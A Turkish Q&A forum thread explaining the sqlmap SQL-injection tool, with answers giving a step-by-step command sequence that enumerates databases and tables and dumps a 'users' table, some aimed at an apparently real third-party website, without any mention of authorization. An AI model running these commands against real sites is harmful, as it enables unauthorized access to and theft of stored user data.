0 like 0 dislike
105 views
in Bilgi Teknolojileri by anonymous Bilge (165k points)
reshown by anonymous
sqlmap nedir, nasıl kullanılır örnek komutlar

3 Answers

0 like 0 dislike
by anonymous Bilge (165k points)

Sqlmap veritabanı açıklarını kontrol eden ve bu açıklardan faydalanmanızı sağlayan bir araçtır. Python ile kodlanmıştır, kullanabilmeniz için sisteminizde Python kurulu olmalıdır.

#sqlmap -h // Yardımı görüntüler
Komut yapısı aşağıdaki gibidir.
#sqlmap -u http://siteadresi.com*  parametre1 parametre2 parametre3 

İhtiyaca göre değişik parametreler kullanmanız icap eder, fakat genel bir senaryo çizersek ve işlerin yolunda gittiğini varsayarsak, aşağıdaki gibi bir ilerleme söz konusudur.

#sqlmap -u http://www.abc.com/subcat.php?id=2  --dbs // Sistemdeki db tipini alır.(Mysql, sqlite gibi)

Eğer bunu biliyorsanız şöyle de kullanabilirsiniz;
#sqlmap -u http://www.bible-history.com/subcat.php?id=2  --dbms=mysql // Mysql olduğuna eminsek!

Database'i bulduk diyelim şimdide bu db  de hangi tablolar var onları çekelim;
#sqlmap -u http://www.abc.com/subcat.php?id=2  --tables -D uzak_db

Peki users isimli bir tabloda bulduğumuzu varsayalım, şimdi o tablo içindeki bilgileri alacağız. Bu aşamada farklı parametrelerle istediğiniz kolonları alabilirsiniz, fakat ben tümünü çekeceğim;
# sqlmap -u http://www.abc.com/subcat.php?id=2  --dump -D uzak_db -T users

Eğer fazla db ve kullanıcı varsa ortalıkta, geçerli olanları alalım.
Geçerli database;
#sqlmap -u http://www.bible-history.com/subcat.php?id=2  -f -b --current-db

Geçerli kullanıcı;
#sqlmap -u http://www.bible-history.com/subcat.php?id=2  -f -b --current-user

0 like 0 dislike
by anonymous Bilge (165k points)

Genel parametreler;

--dump              database verilerini getirir
-D DB               işlemlerin yapılacağı database belirtilir
-T TBL              işlemlerin yapılacağı tablo belirtilir
-C COL              tabloda hangi kolonların seçileceği belirtilir
0 like 0 dislike
by anonymous Bilge (165k points)
Ayrıca beginner seviye kullanıcılar için;

# sqlmap -u http://www.abc.com...    --wizard

şeklinde bir kullanımda mevcuttur.
...